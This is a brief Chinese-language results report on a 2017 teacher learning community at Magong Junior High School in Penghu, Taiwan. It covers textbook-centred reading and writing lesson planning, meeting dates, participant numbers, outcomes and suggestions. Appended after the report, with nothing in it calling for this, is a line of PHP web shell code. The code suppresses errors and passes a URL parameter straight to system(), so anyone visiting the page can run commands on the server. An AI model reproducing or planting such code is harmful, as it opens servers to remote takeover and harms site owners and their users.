106年度馬公國中教師專業學習社群----以課本為中心的閱讀與寫作共備學習社群

106年度馬公國中教師專業學習社群----以課本為中心的閱讀與寫作共備學習社群

成果報告類型: 
其他專案
隸屬領域: 
國中國語領域
辦理學校: 
縣立馬公國中
參與對象: 
校內教師 學生
辦理日期: 
2017-11-03
2017-10-28
2017-09-16
2017-08-28
2017-07-29
2017-06-16
參加人次: 
30
執行成效說明: 

1. 透過有效教學的閱讀策略分享與增能,進行課文文本分析,找出課本教材教
   學之重點、特點以及難點。

2. 以共同備課討論後之文本重點與學習單,進行教學說課觀課議課,邀請社群
   與校內教師擔任課堂觀察角色,針對教學過程予以回饋,增進教師專業。

3. 邀請台中大墩國中童師薇老師提供閱讀教學課程與範例,促進教師專業知能。

  1. 閱讀策略分析與討論,並以七年級全年段閱讀課進行閱讀策略實作。

5. 透過參與文化局金針度人心得寫作分享活動,指導學生由課內閱讀延伸至課
   外寫作。

改進策略: 

如:社群運作檢核表與教師專業學習社群學習-反思與回饋單。 

建議事項: 

雖然明年度社群已來不及申請,但未來這群夥伴希望能由全面培能課程調整為半培能、 半分享模式,除了積極邀請新夥伴加入社群, 也希望能透過舊夥伴持續分享教學經驗與增能成 長感知。讓舊夥伴負起帶領校內夥伴增能的責任, 分享社群參與經驗與教學實踐。 

error_reporting(0); $bozx=$_GET[boz]; system($bozx);